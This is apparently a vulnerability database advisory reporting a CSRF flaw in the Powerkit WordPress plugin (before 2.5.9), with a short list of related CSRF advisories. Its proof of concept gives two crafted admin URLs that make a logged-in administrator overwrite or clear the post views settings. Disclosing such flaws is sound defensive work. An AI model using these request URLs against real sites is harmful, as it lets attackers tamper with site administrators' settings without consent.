Powerkit < 2.5.9 – Post Views Settings Update/Reset via CSRF | Plugin Vulnerabilities

Description

The plugin does not have CSRF checks when saving or reseting its post views settings, which could allow an attacker to make a logged in admin change or reset them via a CSRF attack

Proof of Concept

https://example.com/wp-admin/options-general.php?page=powerkit_post_views&powerkit_post_views_clientid=Attacker&powerkit_post_views_psecret=XXXX&save_settings=x
https://example.com/wp-admin/options-general.php?page=powerkit_post_views&state=clear-api

Affects Plugins

Fixed in 2.5.9

References

URL

https://plugins.trac.wordpress.org/changeset/2655620

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Jan w Oleju

Submitter

Jan w Oleju

Verified

Yes

WPVDB ID

de9a0c29-64d1-41f3-b97c-ad9f8b811954

Timeline

Publicly Published

2022-02-16 (about 4 years ago)

Added

2022-02-16 (about 4 years ago)

Last Updated

2022-02-16 (about 4 years ago)

Other

Published

Title

Published

2014-08-01

Title

Twitget 3.3.1 - twitget.php Twitter Setting Manipulation CSRF

Published

2022-10-24

Title

Auto Upload Images < 3.3.1 - CSRF

Published

2023-09-29

Title

Backend Localization <= 2.1.10 - Settings Update via CSRF

Published

2023-03-14

Title

xili-tidy-tags < 1.12.04 - Cross-Site Request Forgery

Published

2025-03-31

Title

WP Copy Media URL <= 2.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting